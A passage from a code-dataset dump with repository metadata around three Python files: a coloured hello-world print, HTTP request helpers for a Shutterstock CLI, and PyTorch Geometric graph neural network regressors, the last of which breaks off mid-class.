[
"MIT"
] | null | null | null |
pythonteste/Aula11.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
# Greet the world using ANSI escape codes: "1" = bold, "47" = white background,
# and the trailing "\033[m" resets the terminal attributes.
GREETING = "\033[1;47mOlá, mundo!\033[m"
print(GREETING)
| 18.5
| 36
| 0.648649
| 7
| 37
| 3.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.257143
| 0.054054
| 37
| 1
| 37
| 37
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
c847e6f5a5165c04d51932822fdf963d562a8d61
| 2,636
|
py
|
Python
|
shutterstock/utils/request.py
|
shutterstock/shutterstock-cli
|
736a6f0ee1c3fd9cf02095820be79b1a8bbc5f86
|
[
"MIT"
] | 3
|
2021-08-12T23:41:33.000Z
|
2022-03-14T18:52:31.000Z
|
shutterstock/utils/request.py
|
shutterstock/shutterstock-cli
|
736a6f0ee1c3fd9cf02095820be79b1a8bbc5f86
|
[
"MIT"
] | 2
|
2017-09-05T11:26:55.000Z
|
2021-05-08T17:28:45.000Z
|
shutterstock/utils/request.py
|
shutterstock/shutterstock-cli
|
736a6f0ee1c3fd9cf02095820be79b1a8bbc5f86
|
[
"MIT"
] | 2
|
2021-03-25T20:58:52.000Z
|
2022-03-22T08:41:15.000Z
|
"""HTTP functions."""
# FIX: the original opened with four quotes (""""), which embedded a stray
# double-quote character at the start of the module docstring.
import json
import os
import requests
from .prettyprint import pretty_print
from .request_helper import RequestHelper
# Truthy when the user set SHUTTERSTOCK_CLI_COLORIZE_OUTPUT in the environment;
# selects pretty-printed (colorized) output instead of plain json.dumps.
COLORIZE_OUTPUT = os.getenv("SHUTTERSTOCK_CLI_COLORIZE_OUTPUT")
def get(url, params, json_data=None):
    """Fetch a resource via HTTP GET and print the response.

    :param url: URL of the endpoint (appended to the configured base endpoint).
    :param params: Request parameters.
    :param json_data: Request body (accepted for signature parity; GET sends no body).
    :return: None
    """
    helper = RequestHelper()
    response = requests.get(
        url=f"{helper.base_endpoint}{url}",
        params=params,
        headers=helper.headers,
        auth=helper.auth,
    )
    try:
        payload = response.json()
    except json.decoder.JSONDecodeError:
        # Body is not JSON; dump it raw.
        print(response.content)
        return
    if COLORIZE_OUTPUT:
        pretty_print(payload)
    else:
        print(json.dumps(payload, indent=4))
def post(url, params, json_data):
    """Create a resource via HTTP POST and print the response.

    :param url: URL of the endpoint (appended to the configured base endpoint).
    :param params: Request parameters.
    :param json_data: Request body.
    :return: None
    """
    helper = RequestHelper()
    response = requests.post(
        url=f"{helper.base_endpoint}{url}",
        params=params,
        json=json_data,
        headers=helper.headers,
        auth=helper.auth,
    )
    try:
        payload = response.json()
    except json.decoder.JSONDecodeError:
        # Body is not JSON; dump it raw.
        print(response.content)
        return
    if COLORIZE_OUTPUT:
        pretty_print(payload)
    else:
        print(json.dumps(payload, indent=4))
def delete(url, params, json_data):
    """Delete a resource via HTTP DELETE and print the response.

    :param url: URL of the endpoint (appended to the configured base endpoint).
    :param params: Request parameters.
    :param json_data: Request body.
    :return: None
    """
    helper = RequestHelper()
    response = requests.delete(
        url=f"{helper.base_endpoint}{url}",
        params=params,
        json=json_data,
        headers=helper.headers,
        auth=helper.auth,
    )
    try:
        payload = response.json()
    except json.decoder.JSONDecodeError:
        # Body is not JSON; dump it raw.
        print(response.content)
        return
    if COLORIZE_OUTPUT:
        pretty_print(payload)
    else:
        print(json.dumps(payload, indent=4))
def put(url, params, json_data):
    """Replace a resource via HTTP PUT and print the response.

    :param url: URL of the endpoint (appended to the configured base endpoint).
    :param params: Request parameters.
    :param json_data: Request body.
    :return: None
    """
    helper = RequestHelper()
    response = requests.put(
        url=f"{helper.base_endpoint}{url}",
        params=params,
        json=json_data,
        headers=helper.headers,
        auth=helper.auth,
    )
    try:
        payload = response.json()
    except json.decoder.JSONDecodeError:
        # Body is not JSON; dump it raw.
        print(response.content)
        return
    if COLORIZE_OUTPUT:
        pretty_print(payload)
    else:
        print(json.dumps(payload, indent=4))
| 23.327434
| 63
| 0.598255
| 308
| 2,636
| 5.025974
| 0.165584
| 0.056848
| 0.033592
| 0.043928
| 0.814599
| 0.814599
| 0.814599
| 0.814599
| 0.792636
| 0.792636
| 0
| 0.002128
| 0.286798
| 2,636
| 112
| 64
| 23.535714
| 0.821277
| 0.2022
| 0
| 0.73913
| 0
| 0
| 0.064909
| 0.064909
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.072464
| 0
| 0.188406
| 0.188406
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c84de06d4ff0c3c018631ed962f029fe11e6bda3
| 44,436
|
py
|
Python
|
dev/models_pysr.py
|
astrockragh/GraphMerge
|
25869b798158eb9c1c3aa613642c9bbd4a07e300
|
[
"MIT"
] | null | null | null |
dev/models_pysr.py
|
astrockragh/GraphMerge
|
25869b798158eb9c1c3aa613642c9bbd4a07e300
|
[
"MIT"
] | null | null | null |
dev/models_pysr.py
|
astrockragh/GraphMerge
|
25869b798158eb9c1c3aa613642c9bbd4a07e300
|
[
"MIT"
] | null | null | null |
import torch.nn.functional as F
from torch.nn import Linear, LayerNorm, LeakyReLU, Module, ReLU, Sequential, ModuleList
from torch_geometric.nn import SAGEConv, global_mean_pool, norm, global_max_pool, global_add_pool, MetaLayer
from torch_scatter import scatter_mean, scatter_sum, scatter_max, scatter_min, scatter_add
from torch import cat, square,zeros, clone, abs, sigmoid, float32, tanh, clamp
class MLP(Module):
    """Small feed-forward net: input Linear+ReLU, `nlayers` hidden Linear+ReLU
    pairs, an optional LayerNorm, and a final Linear output projection."""

    def __init__(self, n_in, n_out, hidden=64, nlayers=2, layer_norm=True):
        super().__init__()
        stack = [Linear(n_in, hidden), ReLU()]
        for _ in range(nlayers):
            stack += [Linear(hidden, hidden), ReLU()]
        # Normalize just before the output projection when requested.
        if layer_norm:
            stack.append(LayerNorm(hidden))
        stack.append(Linear(hidden, n_out))
        self.mlp = Sequential(*stack)

    def forward(self, x):
        return self.mlp(x)
class Sage(Module):
    """GraphSAGE-based node-only GNN (no edge model, no global model).

    Optionally encodes node features, applies `conv_layers` SAGEConv layers,
    pools nodes per graph ('sum' or 'max'), and decodes one scalar per output
    channel. Optionally also emits per-output variances (`variance`) and
    correlation heads (`rho`) for heteroscedastic losses.
    """

    def __init__(self, hidden_channels, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
                 decode_layers=2, decode_activation='none', layernorm=True, variance=0, agg='sum', rho=0):
        super(Sage, self).__init__()
        '''Model built upon the GraphSAGE convolutional layer. This is a node only model (no global, no edge).
        Model takes a data object from a dataloader in the forward call and takes out the rest itself.
        hidden_channels, n_in, n_out must be specified
        Most other things can be customized at wish, e.g. activation functions for which ReLU and LeakyReLU can be used'''
        self.encode=encode
        if self.encode:
            # Lift raw node features into the hidden dimension before convolutions.
            self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True) #could turn up hidden states
        self.decode_activation=decode_activation
        self.conv_activation=conv_activation
        self.layernorm=layernorm  # stored but not read elsewhere in this class
        self.in_channels=in_channels
        self.out_channels=out_channels
        self.hidden_channels=hidden_channels
        self.variance=variance
        self.agg=agg
        self.rho=rho
        ########################
        # Convolutional Layers #
        ########################
        self.convs=ModuleList()
        if self.encode:
            self.convs.append(SAGEConv(hidden_channels, hidden_channels))
        else:
            # No encoder: the first convolution maps raw features to hidden width.
            self.convs.append(SAGEConv(in_channels, hidden_channels))
        for _ in range(int(conv_layers-1)):
            self.convs.append(SAGEConv(hidden_channels, hidden_channels))
        ##################
        # Decode Layers  #
        ##################
        self.decoders = ModuleList()
        self.norms = ModuleList()
        # One independent (LayerNorm -> Linear) stack per output channel.
        for _ in range(out_channels):
            self.decoder=ModuleList()
            self.norm=ModuleList()
            for i in range(decode_layers):
                if i==decode_layers-1: ## if final layer, make layer with only one output
                    self.norm.append(LayerNorm(normalized_shape=hidden_channels))
                    self.decoder.append(Linear(hidden_channels, 1))
                else:
                    self.norm.append(LayerNorm(normalized_shape=hidden_channels))
                    self.decoder.append(Linear(hidden_channels, hidden_channels))
            self.decoders.append(self.decoder)
            self.norms.append(self.norm)
        ###################
        # Variance Layers #
        ###################
        if variance:
            # Mirrors the decoder stacks; one variance head per output channel.
            self.sigs = ModuleList()
            self.sig_norms = ModuleList()
            for _ in range(out_channels):
                self.sig=ModuleList()
                self.sig_norm=ModuleList()
                for i in range(decode_layers):
                    if i==decode_layers-1:
                        self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
                        self.sig.append(Linear(hidden_channels, 1))
                    else:
                        self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
                        self.sig.append(Linear(hidden_channels, hidden_channels))
                self.sigs.append(self.sig)
                self.sig_norms.append(self.sig_norm)
        ######################
        # Co-Variance Layers #
        ######################
        if self.rho!=0:
            # `rho` extra heads, same stack shape as the decoders.
            self.rhos = ModuleList()
            self.rho_norms = ModuleList()
            for _ in range(self.rho):
                self.rho_l=ModuleList()
                self.rho_norm=ModuleList()
                for i in range(decode_layers):
                    if i==decode_layers-1:
                        self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
                        self.rho_l.append(Linear(hidden_channels, 1))
                    else:
                        self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
                        self.rho_l.append(Linear(hidden_channels, hidden_channels))
                self.rhos.append(self.rho_l)
                self.rho_norms.append(self.rho_norm)
        #####################
        # Activation Layers #
        #####################
        self.conv_act=self.conv_act_f()
        self.decode_act=self.decode_act_f() ## could apply later

    def conv_act_f(self):
        """Resolve the convolution activation from self.conv_activation."""
        if self.conv_activation =='relu':
            print('RelU conv activation')
            act = ReLU()
            return act
        if self.conv_activation =='leakyrelu':
            print('LeakyRelU conv activation')
            act=LeakyReLU()
            return act
        if not self.conv_activation:
            raise ValueError("Please specify a conv activation function")
        # NOTE(review): an unrecognised truthy value falls through and returns
        # None implicitly, which would make forward() raise — confirm intent.

    def decode_act_f(self):
        """Resolve the decoder activation from self.decode_activation."""
        if self.decode_activation =='relu':
            print('RelU decode activation')
            act = ReLU()
            return act
        if self.decode_activation =='leakyrelu':
            print('LeakyRelU decode activation')
            act=LeakyReLU()
            return act
        if not self.decode_activation:
            print("Please specify a decode activation function")
            return None
        # NOTE(review): the default 'none' is a truthy string, so it falls
        # through all branches and returns None; forward() would then fail at
        # self.decode_act(x1). Callers apparently always pass 'relu' or
        # 'leakyrelu' — confirm.

    def forward(self, graph):
        """Run the model on a PyG batch; returns x_out (+ sig, + rho when enabled)."""
        #get the data
        x, edge_index, batch = graph.x, graph.edge_index, graph.batch
        #encode
        if self.encode:
            x = self.node_enc(x)
        #convolutions
        for conv in self.convs:
            x = conv(x, edge_index)
            x=self.conv_act(x) ##choose whichever
        if self.agg=='sum': ## sum for physics
            x = global_add_pool(x, batch)
        if self.agg=='max':
            x = global_max_pool(x, batch)
        #decoder
        x_out=[]
        for norm, decode in zip(self.norms, self.decoders):
            x1=clone(x)
            for n, d in zip(norm, decode):
                x1=d(n(x1))
                x1=self.decode_act(x1) ##note that these are LeakyReLU and should continue as such, otherwise you have to remove them from the last layer
            x_out.append(x1)
        x_out=cat(x_out, dim=1)
        # variance
        if self.variance:
            sig=[]
            for norm, decode in zip(self.sig_norms, self.sigs):
                x1=clone(x)
                for n, d in zip(norm, decode):
                    x1=d(n(x1))
                    x1=self.decode_act(x1) ##note that these are LeakyReLU and should continue as such, otherwise you have to remove them from the last layer
                sig.append(x1)
            sig=abs(cat(sig, dim=1)) #stability
        if self.rho!=0:
            rho=[]
            for norm, decode in zip(self.rho_norms, self.rhos):
                x1=clone(x)
                for n, d in zip(norm, decode):
                    x1=d(n(x1))
                    x1=self.decode_act(x1) ##note that these are LeakyReLU and should continue as such, otherwise you have to remove them from the last layer
                rho.append(x1)
            rho=cat(rho, dim=1)
        if self.variance:
            if self.rho!=0:
                return x_out, sig, clamp(tanh(rho), min=-0.999, max=0.999) #stability
            else:
                return x_out, sig
        else:
            return x_out
######################################
### Make own MetaLayer-based Class ###
######################################
# Aggregators used by the Meta-layer building blocks below; swap in the
# commented scatter_mean to average messages instead of summing them.
node_aggregation = scatter_sum # scatter_mean
global_aggregation = scatter_sum # scatter_mean
class EdgeModel(Module):
    """Residual edge update: edge_attr + MLP([src || dest || edge_attr || u])."""

    def __init__(self, hidden):
        super(EdgeModel, self).__init__()
        # Four concatenated hidden-width feature blocks feed the MLP.
        self.mlp = MLP(hidden * 4, hidden, layer_norm=True)

    def forward(self, src, dest, edge_attr, u, batch):
        # src, dest: [E, F_x]; edge_attr: [E, F_e]; u: [B, F_u] per graph;
        # batch: [E] with max entry B - 1, indexing each edge's graph.
        features = cat([src, dest, edge_attr, u[batch]], 1)
        return edge_attr + self.mlp(features)
class EdgeModel2(Module):
    """Residual edge update without global features: edge_attr + MLP([src || dest || edge_attr])."""

    def __init__(self, hidden):
        super(EdgeModel2, self).__init__()
        # Three concatenated hidden-width feature blocks feed the MLP.
        self.mlp = MLP(3 * hidden, hidden, layer_norm=True)

    def forward(self, src, dest, edge_attr, u, batch):
        # src, dest: [E, F_x]; edge_attr: [E, F_e]; u and batch are accepted
        # for MetaLayer signature compatibility but unused here.
        features = cat([src, dest, edge_attr], 1)
        return edge_attr + self.mlp(features)
class NodeModel(Module):
    """Residual node update from aggregated edge messages plus global state."""

    def __init__(self, hidden):
        super(NodeModel, self).__init__()
        # Message MLP: [x_sender || edge_attr] -> hidden.
        self.node_mlp_1 = MLP(hidden * 2, hidden, layer_norm=True)
        # Update MLP: [x || pooled messages || u[batch]] -> hidden.
        self.node_mlp_2 = MLP(hidden * 3, hidden, layer_norm=True)

    def forward(self, x, edge_index, edge_attr, u, batch):
        # x: [N, F_x]; edge_index: [2, E] with max entry N - 1;
        # edge_attr: [E, F_e]; u: [B, F_u]; batch: [N] with max entry B - 1.
        senders, receivers = edge_index
        messages = self.node_mlp_1(cat([x[senders], edge_attr], dim=1))
        pooled = node_aggregation(messages, receivers, dim=0, dim_size=x.size(0))
        update_input = cat([x, pooled, u[batch]], dim=1)
        return x + self.node_mlp_2(update_input)
class NodeModel2(Module):
    """Residual node update from aggregated edge messages (no global features)."""

    def __init__(self, hidden):
        # FIX: the original called super(NodeModel, self).__init__(), naming the
        # wrong class; since NodeModel2 is not a subclass of NodeModel, that
        # raises "TypeError: super(type, obj): obj must be an instance or
        # subtype of type" on construction.
        super(NodeModel2, self).__init__()
        # Message MLP: [x_sender || edge_attr] -> hidden.
        self.node_mlp_1 = MLP(hidden, hidden, layer_norm=True)
        # Update MLP: [x || pooled messages] -> hidden.
        self.node_mlp_2 = MLP(hidden * 2, hidden, layer_norm=True)

    def forward(self, x, edge_index, edge_attr, u, batch):
        # x: [N, F_x]; edge_index: [2, E] with max entry N - 1;
        # edge_attr: [E, F_e]; u and batch are unused here but kept for
        # MetaLayer signature compatibility.
        row, col = edge_index
        out = cat([x[row], edge_attr], dim=1)
        out = self.node_mlp_1(out)
        out = node_aggregation(out, col, dim=0, dim_size=x.size(0))
        out = cat([x, out], dim=1)
        return x + self.node_mlp_2(out)
class NodeNodeModel(Module):
    """Node-only variant: edges and globals do not influence the update."""

    def __init__(self, hidden):
        super(NodeNodeModel, self).__init__()
        self.node_mlp_1 = MLP(hidden, hidden, layer_norm=True)
        self.node_mlp_2 = MLP(hidden, hidden, layer_norm=True)

    def forward(self, x, edge_index, edge_attr, u, batch):
        # x: [N, F_x], where N is the number of nodes.
        # edge_index: [2, E] with max entry N - 1.
        # edge_attr: [E, F_e]
        # u: [B, F_u]
        # batch: [N] with max entry B - 1.
        row, col = edge_index
        out = x[row]
        out = self.node_mlp_1(out)
        # NOTE(review): the node_mlp_1 pass and this aggregation are computed
        # and then discarded by the `out = x` rebinding below, so they have no
        # effect on the result (only wasted compute). Possibly the aggregated
        # value was meant to be kept — confirm intent before changing.
        out = node_aggregation(out, col, dim=0, dim_size=x.size(0))
        out = x
        return x + self.node_mlp_2(out)
###############################################################################################
## If one is interested in doing some decoding on the global model / put in global features ###
###############################################################################################
class GlobalModel(Module):
    """Residual global update: u + MLP([u || pooled node features])."""

    def __init__(self, hidden):
        super(GlobalModel, self).__init__()
        # Input is the current global state concatenated with pooled nodes.
        self.global_mlp = MLP(hidden * 2, hidden, layer_norm=True)

    def forward(self, x, edge_index, edge_attr, u, batch):
        # x: [N, F_x]; u: [B, F_u]; batch: [N] with max entry B - 1.
        # edge_index and edge_attr are unused but kept for MetaLayer parity.
        pooled = global_aggregation(x, batch, dim=0)
        return u + self.global_mlp(cat([u, pooled], dim=1))
class GlobalModelMulti(Module):
    """Residual global update fed by several pooled node statistics.

    Concatenates the current global state with per-graph sum, min, max, and a
    variance-style term (E[x^2] - E[x]^2) of the node features before the MLP.
    """

    def __init__(self, hidden):
        super(GlobalModelMulti, self).__init__()
        # [u || sum || min || max || var] -> 5 hidden-width blocks.
        self.global_mlp = MLP(hidden * 5, hidden, layer_norm=True)
        '''Global model with many different global feats'''

    def forward(self, x, edge_index, edge_attr, u, batch):
        # x: [N, F_x]; u: [B, F_u]; batch: [N] with max entry B - 1.
        # edge_index and edge_attr are unused but kept for MetaLayer parity.
        total = scatter_sum(x, batch, dim=0)
        mean = scatter_mean(x, batch, dim=0)
        minimum = scatter_min(x, batch, dim=0)[0]
        maximum = scatter_max(x, batch, dim=0)[0]
        spread = scatter_mean(square(x), batch, dim=0) - square(mean)
        stacked = cat([u, total, minimum, maximum, spread], dim=1)
        return u + self.global_mlp(stacked) ## still a bit in doubt over if this should be a sum
###############################################################################################
# Put it all together like https://arxiv.org/pdf/1806.01261.pdf
class MetaMulti(Module):
    """Full graph-network stack (https://arxiv.org/pdf/1806.01261.pdf):
    node/edge encoders, `conv_layers` MetaLayers with multi-statistic global
    updates, sum-pooling, then an MLP decoder on the pooled representation.
    """

    def __init__(self, hidden_states, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
                 decode_layers=1, decode_activation='none', layernorm=True):
        # FIX: the original used super(self.__class__, self).__init__(), which
        # recurses infinitely if this class is ever subclassed; name the class
        # explicitly instead. Behavior is identical for direct instantiation.
        super(MetaMulti, self).__init__()
        '''This model is in early attempt, it's a bit slow but has higher levels of interpretability and should theoretically be better'''
        hidden = hidden_states
        n_in = in_channels
        n_out = out_channels
        self.node_enc = MLP(n_in, hidden, layer_norm=True)
        # Edge encoder input is 3-wide: edge_attr plus two node-feature deltas.
        self.edge_enc = MLP(3, hidden, layer_norm=True)
        self.decoder = MLP(hidden, n_out)
        self.ops = ModuleList(
            [
                MetaLayer(edge_model=EdgeModel(hidden), node_model=NodeModel(hidden), global_model=GlobalModelMulti(hidden))
                for _ in range(conv_layers)
            ]
        )
        self.hidden = hidden
        self.norm_out = LayerNorm(normalized_shape=self.hidden)

    def forward(self, graph):
        x = self.node_enc(graph.x)  # Take all feats and encode
        e_feat = graph.x[:, [0, 3]]  # scale factor and virial mass
        adj = graph.edge_index
        e_encode = cat([graph.edge_attr.view(-1, 1), e_feat[adj[0]] - e_feat[adj[1]]], -1)
        e = self.edge_enc(e_encode)  # put in edge_attr
        # Initialize global features as 0:
        u = zeros(
            graph.batch[-1] + 1, self.hidden, device=x.device, dtype=float32
        )
        batch = graph.batch
        for op in self.ops:
            x, e, u = op(x, adj, e, u, batch)
        x = global_add_pool(x, batch)
        out = self.decoder(self.norm_out(x))
        return out
class Meta(Module):
def __init__(self, hidden_channels, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
decode_layers=2, decode_activation='none', layernorm=True, variance=0, agg='sum', rho=0):
super(Meta, self).__init__()
'''Same as above but without the multi concat '''
self.encode=encode
self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
self.edge_enc = MLP(3, hidden_channels, layer_norm=True)
self.decode_activation=decode_activation
self.conv_activation=conv_activation
self.layernorm=layernorm
self.in_channels=in_channels
self.out_channels=out_channels
self.hidden_channels=hidden_channels
self.variance=variance
self.agg=agg
self.rho=rho
########################
# Convolutional Layers #
########################
self.convs=ModuleList()
self.convs.append(MetaLayer(edge_model=EdgeModel(hidden_channels), node_model=NodeModel(hidden_channels), global_model=GlobalModelMulti(hidden_channels)))
for _ in range(int(conv_layers-1)):
self.convs.append(MetaLayer(edge_model=EdgeModel(hidden_channels), node_model=NodeModel(hidden_channels), global_model=GlobalModelMulti(hidden_channels)))
##################
# Decode Layers #
##################
self.decoders = ModuleList()
self.norms = ModuleList()
for _ in range(out_channels):
self.decoder=ModuleList()
self.norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1: ## if final layer, make layer with only one output
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, 1))
else:
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, hidden_channels))
self.decoders.append(self.decoder)
self.norms.append(self.norm)
###################
# Variance Layers #
###################
if variance:
self.sigs = ModuleList()
self.sig_norms = ModuleList()
for _ in range(out_channels):
self.sig=ModuleList()
self.sig_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, 1))
else:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, hidden_channels))
self.sigs.append(self.sig)
self.sig_norms.append(self.sig_norm)
######################
# Co-Variance Layers #
######################
if self.rho!=0:
self.rhos = ModuleList()
self.rho_norms = ModuleList()
for _ in range(self.rho):
self.rho_l=ModuleList()
self.rho_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, 1))
else:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, hidden_channels))
self.rhos.append(self.rho_l)
self.rho_norms.append(self.rho_norm)
#####################
# Activation Layers #
#####################
self.conv_act=self.conv_act_f()
self.decode_act=self.decode_act_f() ## could apply later
def conv_act_f(self):
if self.conv_activation =='relu':
print('RelU conv activation')
act = ReLU()
return act
if self.conv_activation =='leakyrelu':
print('LeakyRelU conv activation')
act=LeakyReLU()
return act
if not self.conv_activation:
raise ValueError("Please specify a conv activation function")
def decode_act_f(self):
    """Return the decoder activation module selected by ``self.decode_activation``.

    Supported names: ``'relu'``, ``'leakyrelu'``; ``'none'`` (the
    constructor default) or a falsy value means "no activation".

    Returns:
        A callable nn.Module (Identity when no activation is requested).

    Raises:
        ValueError: if the activation name is unrecognised.
    """
    if self.decode_activation == 'relu':
        print('RelU decode activation')
        return ReLU()
    if self.decode_activation == 'leakyrelu':
        print('LeakyRelU decode activation')
        return LeakyReLU()
    # 'none' (the default) used to fall through and return None, which made
    # forward() raise "'NoneType' object is not callable" on the first call.
    # Identity is a callable no-op with the intended meaning.
    from torch.nn import Identity
    if not self.decode_activation or self.decode_activation == 'none':
        return Identity()
    raise ValueError("Unknown decode activation: %r" % (self.decode_activation,))
def forward(self, graph):
    """Encode node/edge features, run the MetaLayer convolutions (this
    variant also carries a global state ``u``), pool to graph level and
    decode one scalar per output head.

    Args:
        graph: a torch_geometric ``Data``/``Batch`` providing ``x``,
            ``edge_index``, ``edge_attr`` and ``batch``.

    Returns:
        ``x_out`` of shape (n_graphs, out_channels); additionally ``sig``
        (elementwise-abs head outputs) when ``self.variance`` is set, and
        ``tanh(rho)`` when ``self.rho`` is non-zero.
    """
    #get the data
    x = self.node_enc(graph.x) # Take all feats and encode
    # assumes columns 0 and 3 of graph.x are scale factor and virial mass
    # (per the original comment) — TODO confirm against the dataset builder
    e_feat = graph.x[:,[0,3]] # scale factor and virial mass
    adj = graph.edge_index
    # Edge encoding: raw edge attribute plus the across-edge difference of
    # the two selected node features.
    e_encode=cat([graph.edge_attr.view(-1,1), e_feat[adj[0]] - e_feat[adj[1]]], -1)
    e = self.edge_enc(e_encode) #put in edge_attr
    # Initialize global features as 0:
    u = zeros(
        graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
    )
    #convolutions
    batch = graph.batch
    for op in self.convs:
        # Unlike the no-global variants below, u is updated and fed back in.
        x, e, u = op(x, adj, e, u, batch)
    # Graph-level readout; self.agg selects the pooling operator.
    if self.agg=='sum':
        x = global_add_pool(x, batch)
    if self.agg=='max':
        x = global_max_pool(x, batch)
    #decoder: one independent LayerNorm+Linear stack per output channel,
    # each applied to a fresh copy of the pooled features.
    x_out=[]
    for norm, decode in zip(self.norms, self.decoders):
        x1=clone(x)
        for n, d in zip(norm, decode):
            x1=d(n(x1))
        x1=self.decode_act(x1)
        x_out.append(x1)
    x_out=cat(x_out, dim=1)
    # variance heads: identical structure, outputs made non-negative via abs
    if self.variance:
        sig=[]
        for norm, decode in zip(self.sig_norms, self.sigs):
            x1=clone(x)
            for n, d in zip(norm, decode):
                x1=d(n(x1))
            x1=self.decode_act(x1)
            sig.append(x1)
        sig=abs(cat(sig, dim=1))
    # co-variance heads (computed even when variance is off, though only
    # returned when both are enabled)
    if self.rho!=0:
        rho=[]
        for norm, decode in zip(self.rho_norms, self.rhos):
            x1=clone(x)
            for n, d in zip(norm, decode):
                x1=d(n(x1))
            x1=self.decode_act(x1)
            rho.append(x1)
        rho=abs(cat(rho, dim=1)) ### not sure this works with only 1d
    if self.variance:
        if self.rho!=0:
            # NOTE: rho passed through abs() above, so tanh(rho) is in [0,1)
            return x_out, sig, tanh(rho)
        else:
            return x_out, sig
    else:
        return x_out
class MetaEdge2(Module):
    """Graph-network regressor with edge and node models but no global model.

    Node features are MLP-encoded; initial edge features are built by
    summing each edge's encoded source-node features into the destination
    index and re-encoding with an MLP. After ``conv_layers`` MetaLayer
    blocks, node features are pooled per graph and decoded by
    ``out_channels`` independent LayerNorm+Linear heads. Optional extra
    heads predict per-target variances (``variance``) and pairwise
    correlations (``rho``).
    """

    def __init__(self, hidden_channels, in_channels, out_channels, encode=True,
                 conv_layers=3, conv_activation='relu', decode_layers=2,
                 decode_activation='none', layernorm=True, variance=0,
                 agg='sum', rho=0):
        super(MetaEdge2, self).__init__()
        self.encode = encode
        self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
        self.edge_enc = MLP(hidden_channels, hidden_channels, layer_norm=True)
        self.decode_activation = decode_activation
        self.conv_activation = conv_activation
        self.layernorm = layernorm
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.hidden_channels = hidden_channels
        self.variance = variance
        self.agg = agg
        self.rho = rho
        ########################
        # Convolutional Layers #
        ########################
        self.convs = ModuleList()
        for _ in range(int(conv_layers)):
            self.convs.append(MetaLayer(edge_model=EdgeModel2(hidden_channels),
                                        node_model=NodeModel(hidden_channels),
                                        global_model=None))
        ##################
        # Decode Layers #
        ##################
        self.decoders = ModuleList()
        self.norms = ModuleList()
        for _ in range(out_channels):
            # NOTE: self.decoder/self.norm are loop temporaries that also
            # register as submodules; kept assigned so state_dict keys stay
            # compatible with checkpoints saved by the original code.
            self.decoder, self.norm = self._make_head(decode_layers)
            self.decoders.append(self.decoder)
            self.norms.append(self.norm)
        ###################
        # Variance Layers #
        ###################
        if variance:
            self.sigs = ModuleList()
            self.sig_norms = ModuleList()
            for _ in range(out_channels):
                self.sig, self.sig_norm = self._make_head(decode_layers)
                self.sigs.append(self.sig)
                self.sig_norms.append(self.sig_norm)
        ######################
        # Co-Variance Layers #
        ######################
        if self.rho != 0:
            self.rhos = ModuleList()
            self.rho_norms = ModuleList()
            for _ in range(self.rho):
                self.rho_l, self.rho_norm = self._make_head(decode_layers)
                self.rhos.append(self.rho_l)
                self.rho_norms.append(self.rho_norm)
        #####################
        # Activation Layers #
        #####################
        self.conv_act = self.conv_act_f()  # not used in forward() here
        self.decode_act = self.decode_act_f()

    def _make_head(self, decode_layers):
        """Build one decoder head: a (Linear, LayerNorm) pair per layer,
        with the final Linear mapping hidden_channels -> 1."""
        linears = ModuleList()
        norms = ModuleList()
        for i in range(decode_layers):
            norms.append(LayerNorm(normalized_shape=self.hidden_channels))
            width = 1 if i == decode_layers - 1 else self.hidden_channels
            linears.append(Linear(self.hidden_channels, width))
        return linears, norms

    def conv_act_f(self):
        """Select the convolution activation; raises on unknown names
        (previously unrecognised truthy names silently returned None)."""
        if self.conv_activation == 'relu':
            print('RelU conv activation')
            return ReLU()
        if self.conv_activation == 'leakyrelu':
            print('LeakyRelU conv activation')
            return LeakyReLU()
        raise ValueError("Please specify a conv activation function")

    def decode_act_f(self):
        """Select the decoder activation; 'none' (the default) or a falsy
        value yields a callable Identity no-op. Previously None was
        returned, which made forward() raise TypeError."""
        if self.decode_activation == 'relu':
            print('RelU decode activation')
            return ReLU()
        if self.decode_activation == 'leakyrelu':
            print('LeakyRelU decode activation')
            return LeakyReLU()
        from torch.nn import Identity
        if not self.decode_activation or self.decode_activation == 'none':
            return Identity()
